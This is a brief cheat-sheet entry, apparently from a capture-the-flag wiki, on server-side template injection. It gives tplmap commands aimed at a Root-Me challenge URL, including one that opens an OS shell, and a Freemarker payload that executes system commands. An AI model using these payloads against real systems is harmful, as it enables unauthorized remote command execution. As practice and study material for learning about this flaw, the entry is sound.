SSTI
Server Side Template Injection
# You can use tools like tplmap
./tplmap.py -u http://challenge01.root-me.org/web-serveur/ch41/check -d "nickname=john"
./tplmap.py -u http://challenge01.root-me.org/web-serveur/ch41/check -d "nickname=john" --os-shell
# Freemarker command execution
<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("cmd") }
Last updated